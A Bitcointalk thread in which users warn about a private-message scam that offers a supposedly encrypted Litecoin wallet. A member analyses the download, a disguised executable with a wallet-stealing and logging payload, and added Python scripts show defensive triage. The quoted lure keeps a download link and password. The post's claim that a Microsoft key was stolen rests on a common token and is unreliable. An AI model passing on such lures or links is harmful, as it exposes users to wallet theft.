Topic: ALERT: Malware in PM (Not NMC) [Re: Project 1 - Split LTC into 100 Addresses] (Read 2397 times)

legendary
Activity: 924
Merit: 1129

Reward received.  Thank you kindly, enough for groceries several months.  :-)   Also, now feel good about work;  definite not wasted effort now.

Edward. 
legendary
Activity: 924
Merit: 1129


Hey, congrats on setting a fine example of how to apply your interests/abilities/time and produce something useful. Post an addy for a well-earned reward.

Ooooh, I never turn down money.   Grin  Thanks, makes me feel less like waste of time.  1MhzpSt9NwjGejwAyZpX2GwTssYYdhPRZn is a nice addy if you want to reward. 

Already sent sneaky asm modules to antivirus contractors; got 3 on my client list as consultant. I tend to be vindictive when someone tries trojan me. Like I said, funny game.  It was my move.

sr. member
Activity: 336
Merit: 250
Cuddling, censored, unicorn-shaped troll.
Impressive report, Edward.
The fact code wasn't obfuscated (or not enough for you, at least) makes me think you're on the right track when thinking someone got a well-designed, core "event-logger" and adapted it to target bitcoin users.
You should probably submit those finds to major security actors, so the malware core signature becomes recognized as a threat by mainstream antiviruses.

hero member
Activity: 756
Merit: 522
Malware definite.  
...

Hey, congrats on setting a fine example of how to apply your interests/abilities/time and produce something useful. Post an addy for a well-earned reward.
hero member
Activity: 784
Merit: 1000
Casper - A failed entrepreneur who looks like Zhou
Thanks Ed. Hope it is not a tldr for everyone, I guess I should read it twice and see how should I deal with my Teamviewer. Since I still wanna connect to home in my school comp.
legendary
Activity: 1554
Merit: 1222
brb keeping up with the Kardashians
Nice work, Edward. Thanks!
legendary
Activity: 924
Merit: 1129
Okay, final update. 

Is definitely remote desktop exploit.  Finally found path connect to outside.  Very sneaky.  Remote desktop get raw bytes from outside over network, but do nothing with.  Fake windows update is pretend part of 'operating system' and have access low-level memory.  Can finds 'magic numbers' in remote desktop client code, get offset to buffer, use pointer to read buffer.  Then fake windows update transform raw bytes in buffer into UI events from virtual second screen and keyboard/mouse in remote desktop. 

Oy.  My head hurts.  Remember I said way second keyboard/mouse was connected made no sense?  Driven by reads from buffer never allocated or written, not memory mapped to any hardware or interrupt service.  Pointer to buffer calculated from random-looking computations in assembly language.  On other side, was network channel remote desktop part just read mysterious bytes from, then did nothing with bytes.  This is why.

Does English have word for something which one feels both proud and ashamed?  I feel this, over figuring this out.  Left horn, satisfied because finally understood code.  Right horn, feel like stupid OCD wasted effort; already knew it was malware.  Right thing to do is still same. 

legendary
Activity: 924
Merit: 1129
Figured out socket layer part.  May be more to it than this, but this is sure.

Logger thing can't use operating system calls communicate with fake Windows update.  Is because fake Windows update is pretend part of UI manager and Logger or remote desktop thing not run with UI privilege.  Fake Windows update and Logger or remote desktop thing pass information each other using socket layer instead.   Roll Eyes This what Windows "security" is like?

Privilege as invoker means logger or remote desktop thing can use socket layer access network.  But Fake Windows UI thing has no such privilege, can only use socket layer talk to local programs.   Looking more and more like must be remote desktop not just logger, but haven't found outside connection yet.

legendary
Activity: 924
Merit: 1129
Okay, downloading again, more look.

Think probably a year or two worth of coding effort in part that installs here, plus whoever did has sensitive key from Microsoft.  Took resources random hacker would not have, stolen from high security machine which compile windows updates.   Shocked  Part that search mail wallet.dat before installs though, simple and stupid, probably attach to main payload coded by someone else. 

Has XML code for windows registry addition of resident assembly module, contain requested privileges requestedExecutionLevel="asInvoker"  uiAccess="false", but hook into UI anyway, must bypass Windows security.  Next bit explain how.  XML for windows registry also contain reference to assembly module supposed to be update for "Microsoft.Windows.Common.Controls version 6.0.0.0", which gives publicKeyToken="6595b64144ccf1df"

Attackers found Microsoft key lets them sign code installs operating system "update"!   Angry

Is DEFINITELY not just random hacker.  Such keys not available free and cheap download, had to be stolen.

Different styles in different parts.  Code which search and mail wallet.dat separate, coded with something higher level language, compiled with stupid compiler into bad inefficient  assembly.  Logger or remote desktop thing very different, very clever assembly, efficient fast hard to figure out and obvious hand coded.  Also separate into at least two executables when run, one for raping windows UI and one for taking advantage of rape.

Assembler attach table of macro values when assembled.  Can tell date assembler was called from date string stored in table even though code not use.   Most recent assembly of clever parts on 20 November 2012.  Fake windows UI update at 08:58:32 and linked logger or remote desktop thing part at 09:04:41.  So, not very recent, most likely is hacker download. Stupid compiler in first part not attach table include date.
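The manifest attributes quoted above (requestedExecutionLevel level="asInvoker", uiAccess="false", and a dependentAssembly on Microsoft.Windows.Common-Controls 6.0.0.0 with publicKeyToken 6595b64144ccf1df) are the kind of thing an analyst pulls out of a dropped binary first. The script below is an added example, not code from the thread or from the sample being discussed; the manifest text it parses is constructed, with a hypothetical assembly name "Example.Update", and only the attributes named in the post are modelled on the real thing. It extracts the declared execution level, the uiAccess request and every declared dependency, and turns them into review flags. Two caveats a practitioner would want: a manifest is a request to the loader, so uiAccess="false" only means the process is not granted the UIPI exemption, it says nothing about what the code does through other routes, which is why the observation that it hooks the UI anyway matters; and every application that opts into comctl32 version 6 declares that same dependentAssembly with that same token, so the example reports the identity for comparison rather than treating it as conclusive on its own.

```python
import xml.etree.ElementTree as ET

# Constructed sample manifest (hypothetical name "Example.Update"), modelled on
# the attributes quoted in the thread; it is not the manifest from the sample.
SAMPLE_MANIFEST = """<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity name="Example.Update" version="1.0.0.0" type="win32"
                    processorArchitecture="x86"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls"
                        version="6.0.0.0" processorArchitecture="*"
                        publicKeyToken="6595b64144ccf1df" language="*"/>
    </dependentAssembly>
  </dependency>
</assembly>
"""

# The common-controls v6 identity that ordinary applications declare.
COMMON_CONTROLS_TOKEN = "6595b64144ccf1df"


def _local(tag: str) -> str:
    """Strip the XML namespace so asm.v1 and asm.v3 elements match by local name."""
    return tag.rsplit("}", 1)[-1]


def parse_manifest(xml_text: str) -> dict:
    """Pull the privilege declarations and dependencies out of an app manifest."""
    root = ET.fromstring(xml_text)
    info = {"name": None, "execution_level": None, "ui_access": False, "dependencies": []}
    # The assembly's own identity is a direct child of <assembly>.
    for child in root:
        if _local(child.tag) == "assemblyIdentity":
            info["name"] = child.get("name")
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "requestedExecutionLevel":
            info["execution_level"] = el.get("level")
            info["ui_access"] = el.get("uiAccess", "false").lower() == "true"
        elif tag == "dependentAssembly":
            for child in el:
                if _local(child.tag) == "assemblyIdentity":
                    info["dependencies"].append(
                        {k: child.get(k) for k in ("name", "version", "publicKeyToken")}
                    )
    return info


def triage(info: dict) -> list:
    """Turn the declared privileges into review flags; an empty list means
    the manifest asks for nothing unusual (which is not the same as benign)."""
    flags = []
    if info["execution_level"] == "requireAdministrator":
        flags.append("requests elevation on launch")
    if info["ui_access"]:
        flags.append("uiAccess=true: asks for the UIPI exemption, which Windows only "
                     "honours for Authenticode-signed binaries in secure install paths")
    for dep in info["dependencies"]:
        if dep["name"] == "Microsoft.Windows.Common-Controls" and dep["publicKeyToken"] != COMMON_CONTROLS_TOKEN:
            flags.append(f"common-controls dependency carries unexpected token {dep['publicKeyToken']}")
    return flags


if __name__ == "__main__":
    parsed = parse_manifest(SAMPLE_MANIFEST)
    print(parsed)
    print("flags:", triage(parsed) or "none")
```

Run it against a manifest extracted from the dropped module (with a PE resource tool or by reading the RT_MANIFEST resource) in place of SAMPLE_MANIFEST; a non-empty flag list, or a declared uiAccess that does not match the binary's signing and install location, is what you escalate.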


b!z
legendary
Activity: 1582
Merit: 1010
Malware definite. 

Good (BAD!!) malware too, look like written direct in assembly.  Does things high level compiler never ever do like use as data (including instructions!) from code segment, to make value pun elsewhere, use as number or insert in string.  Horrible to trace, damned clever.

Executable first attempts find mail wallet.dat files.  Then install some kind amazing big logger. 

Not just keyboard logger, but whole UI.  Every element every window every action every mouse move click.  Record everything you see on screen, record everything programs read/write/send/receive.  Even special code for command window, handle text not graphic.  Scary amazing.  Never seen before.  Looks like has code for two display and two sets of keyboard/mouse but way second keyboard/mouse connected make no sense.

Not figure out what do with all yet; involves sockets layer but haven't found sure yet whether network or local.  Strong suspect network; nobody go to this trouble for anything but live eavesdrop/report, or maybe run remote desktop.

Also not figure out yet for sure whether just log use, or also give remote desktop.   Strong suspect remote desktop, or what for found code for handle second keyboard/mouse? 

Either way though, malware definite.  Never Ever run on windows box. 

Have seen enough this poison thing.  Will delete now.  Want more information, you know where get executable look at yourself.  Don't want it near my machine, and my machine not even the operating system it wants prey on.

----

If want to reward obsessive/compulsive disorder made me stare this so long, 1HCizpYzpcngaRHnrKfsm9iww4SExsMk34


Good analysis. Do you think it was coded by the one spreading or is it commercial malware?
legendary
Activity: 924
Merit: 1129
Malware definite.  

Good (BAD!!) malware too, look like written direct in assembly.  Does things high level compiler never ever do like use as data (including instructions!) from code segment, to make value pun elsewhere, use as number or insert in string.  Horrible to trace, damned clever.

Executable first attempts find mail wallet.dat files.  Then install some kind amazing big logger.  

Not just keyboard logger, but whole UI.  Every element every window every action every mouse move click.  Record everything you see on screen, record everything programs read/write/send/receive.  Even special code for command window, handle text not graphic.  Scary amazing.  Never seen before.  Looks like has code for two display and two sets of keyboard/mouse but way second keyboard/mouse connected make no sense.

Not figure out what do with all yet; involves sockets layer but haven't found sure yet whether network or local.  Strong suspect network; nobody go to this trouble for anything but live eavesdrop/report, or maybe run remote desktop.

Also not figure out yet for sure whether just log use, or also give remote desktop.   Strong suspect remote desktop, or what for found code for handle second keyboard/mouse?  

Either way though, malware definite.  Never Ever run on windows box.  

Have seen enough this poison thing.  Will delete now.  Want more information, you know where get executable look at yourself.  Don't want it near my machine, and my machine not even the operating system it wants prey on.

----

If want to reward obsessive/compulsive disorder made me stare this so long, 1HCizpYzpcngaRHnrKfsm9iww4SExsMk34
b!z
legendary
Activity: 1582
Merit: 1010
I've written some of my findings on this particular malicious actor, who could be responsible for sending this malware in PM here: https://bitcointalksearch.org/topic/close-287573
b!z
legendary
Activity: 1582
Merit: 1010
Code:
indigenous: https://bitcointalk.org/index.php?action=profile;u=121605
DoNotMineD: https://bitcointalk.org/index.php?action=profile;u=135183
Coin4Future: https://bitcointalk.org/index.php?action=profile;u=135184
Time2Rest: https://bitcointalk.org/index.php?action=profile;u=135185
hundleycrozco: https://bitcointalk.org/index.php?action=profile;u=136164
dial2mcallister: https://bitcointalk.org/index.php?action=profile;u=137012
247Trader: https://bitcointalk.org/index.php?action=profile;u=142679
CoinsMiner: https://bitcointalk.org/index.php?action=profile;u=135182

List of alts by the same person. Note how all of their posts are in the same threads, with similar replies. They also have similar account creation dates. I'm sure more can be found by looking in the threads that they have posted in for accounts with similar posts.
legendary
Activity: 3192
Merit: 1278
Primedice.com, Stake.com
99% sure that this is a hacked account and not the real owner. Undecided

I'd wager otherwise, their loan to me for .4 was due today:
https://bitcointalksearch.org/topic/m.2959675

seems he saw his time was running out and wanted to grab what he could.
legendary
Activity: 924
Merit: 1129
More picking at executable.  Full name of file that unzips is "wallet.dat [email protected]

Found asm code for reading own command line.  Found string that if passed to cmd instance invoke sendmail (treated as symlink to Outlook on Win box). 

Now trying figure out what it wants send.  Is more string, but obfuscated in executable with XOR something-or-other. Soon as I know what, will post back. Need documenting of Windows interrupts and DLL links; not use myself and no man pages.

Edward.
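The post above describes a mail-target string hidden in the executable "with XOR something-or-other". The usual triage step for that is to try every single-byte key against the suspicious region and rank the decodings by how much printable text and how many expected keywords come out. The script below is an added example for readers of this thread, not code from the post or from the sample: the obfuscated blob is constructed here (a hypothetical command line XORed with key 0x5A), and the keyword list is an assumption about what an analyst would search for. It also pulls printable runs out of the winning decoding, the way the `strings` tool would, so the recovered text can be read without executing anything.

```python
import string

# Constructed sample: a command string a dropper might hide, XORed with one
# byte (key 0x5A). Hypothetical content, not bytes from the real executable.
SECRET = b"sendmail -t victim@example.invalid < wallet.dat"
KEY = 0x5A
BLOB = bytes(b ^ KEY for b in SECRET)

PRINTABLE = set(string.printable.encode("ascii"))
# Assumed keywords worth boosting; adjust to the case at hand.
KEYWORDS = (b"wallet.dat", b"sendmail", b"cmd", b"http")


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def printable_ratio(buf: bytes) -> float:
    """Fraction of bytes that are printable ASCII; 1.0 looks like clean text."""
    if not buf:
        return 0.0
    return sum(b in PRINTABLE for b in buf) / len(buf)


def recover_single_byte_xor(blob: bytes, keywords=KEYWORDS) -> dict:
    """Try every single-byte key and keep the best-scoring decoding.

    Score = printable fraction plus 1.0 per keyword found, so a decoding that
    both looks like text and mentions wallet.dat beats one that is merely
    printable by accident."""
    best = None
    for key in range(256):
        cand = xor_bytes(blob, key)
        hits = [k for k in keywords if k in cand.lower()]
        score = printable_ratio(cand) + len(hits)
        if best is None or score > best["score"]:
            best = {"key": key, "plaintext": cand, "score": score, "hits": hits}
    return best


def ascii_strings(buf: bytes, min_len: int = 4) -> list:
    """Like the `strings` tool: printable runs of at least min_len bytes."""
    out, run = [], bytearray()
    for b in buf:
        if b in PRINTABLE and b not in b"\t\n\r\x0b\x0c":
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode("ascii"))
    return out


if __name__ == "__main__":
    result = recover_single_byte_xor(BLOB)
    print(f"key=0x{result['key']:02x} score={result['score']:.2f} hits={result['hits']}")
    for s in ascii_strings(result["plaintext"]):
        print("  ", s)
```

Single-byte XOR is the common case; if no key scores above the printable baseline, the string is more likely under a repeating key or a real cipher, and the next step is to read the decoding routine in the disassembly rather than guess.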
hero member
Activity: 784
Merit: 1000
Casper - A failed entrepreneur who looks like Zhou
I Guess bitcointalk soon need some big update. Even one of my friends account got stolen. Mine too in the past despite minor destroy was made.

Plus I think the email system need to be changed that it will take effect after like 7 days. So we still have time to retrieve the password back if someone hacked in change teerytuing.

And finally. When will the 2FA be here --
legendary
Activity: 1134
Merit: 1112
Hi Jonsi,
Yes, it is encrypted. Just download the wallet and submit password: 58Charlene56 to open it. I have 327 LTC in it. If you got success I'll transfer another one.

Here is the link:
http://(malware)files/latest/download?source=dlp

Thanks
Charlene
FROM: mscharleneb


Warning do not open it (i opened it in vault)

Trusted people please neg rate him as scammer prevent newbies to get in trap.
Mod please find someone who can delete those msg ASAP

99% sure that this is a hacked account and not the real owner. Undecided
legendary
Activity: 924
Merit: 1129
Got same message.  Picked apart zipfile, unzips just fine from command line with password given (always safer, command line unzip not run executable) is not wallet format, is executable format.  Bzzt, wrong answer.  Funny game!  Hmmm, my move now....
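The check described in this post, unzipping from the command line and looking at what comes out instead of double-clicking it, is worth doing by file content rather than by file name. The script below is an added example, not code from the post or from anyone in the thread: it reads each archive entry as bytes, identifies it by magic numbers (an MZ header means a PE executable; a legacy wallet.dat is a Berkeley DB btree file, magic 0x053162 at offset 12; newer Bitcoin Core wallets are SQLite), and for a PE goes one step beyond the post by reading the COFF TimeDateStamp, the build-time field in the header. The sample archive is constructed in the script: its "wallet.dat" entry is a minimal PE-shaped image with a timestamp chosen to match the 20 November 2012 08:58:32 date mentioned later in the thread. Python's zipfile can read a ZipCrypto-protected archive when given pwd=, but cannot write one, so the constructed sample is unencrypted.

```python
import io
import struct
import zipfile
from datetime import datetime, timezone


def build_fake_pe(timestamp: int) -> bytes:
    """Constructed sample: MZ stub + PE signature + 20-byte COFF header.
    Enough header for the checks below; it is not a runnable program."""
    mz = bytearray(0x40)
    mz[0:2] = b"MZ"
    struct.pack_into("<I", mz, 0x3C, 0x40)  # e_lfanew: PE header starts at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0xE0, 0x102)
    return bytes(mz) + b"PE\0\0" + coff


def classify(data: bytes) -> str:
    """Identify a file by its magic bytes instead of trusting its name."""
    if data[:2] == b"MZ":
        return "pe-executable"
    if data[:16] == b"SQLite format 3\0":
        return "sqlite-database"  # descriptor wallets in newer Bitcoin Core
    if len(data) >= 16 and data[12:16] in (b"\x62\x31\x05\x00", b"\x00\x05\x31\x62"):
        return "berkeley-db"      # legacy wallet.dat, btree magic 0x053162
    return "unknown"


def pe_timestamp(data: bytes):
    """Read the COFF TimeDateStamp from a PE image (UTC). The field is set by
    the linker and can be forged, so treat it as a hint, not proof."""
    if len(data) < 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(data) < e_lfanew + 12:
        return None
    ts = struct.unpack_from("<I", data, e_lfanew + 8)[0]
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def triage_zip(zip_bytes: bytes, pwd: bytes = None) -> dict:
    """Inspect every entry in an archive without executing anything."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info, pwd=pwd)  # bytes only; nothing is launched
            kind = classify(data)
            entry = {"kind": kind, "size": len(data), "pe_timestamp": None}
            if kind == "pe-executable":
                ts = pe_timestamp(data)
                entry["pe_timestamp"] = ts.strftime("%Y-%m-%d %H:%M:%S") if ts else None
            results[info.filename] = entry
    return results


def make_sample_zip() -> bytes:
    """Constructed archive: an entry called wallet.dat that is really a PE."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("wallet.dat", build_fake_pe(1353401912))  # 2012-11-20 08:58:32 UTC
    return buf.getvalue()


if __name__ == "__main__":
    for name, entry in triage_zip(make_sample_zip()).items():
        print(name, entry)
```

A "wallet" whose entry classifies as pe-executable is the "Bzzt, wrong answer" of the post in one line; the timestamp is a bonus for correlating samples, with the caveat in the code comment that it is attacker-settable.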

newbie
Activity: 9
Merit: 0
just got the same PM from user "Time2Rest":


I got it as well. Scammers all over the place  Sad
jr. member
Activity: 60
Merit: 1
just got the same PM from user "Time2Rest":

Hi Jonsi,
Yes, it is encrypted. Just download the wallet and submit password: 58Charlene56 to open it. I have 327 LTC in it. If you got success I'll transfer another one.

Here is the link:
http://sourceforge.net/projects/walletdat/files/latest/download?source=dlp

Thanks
Charlene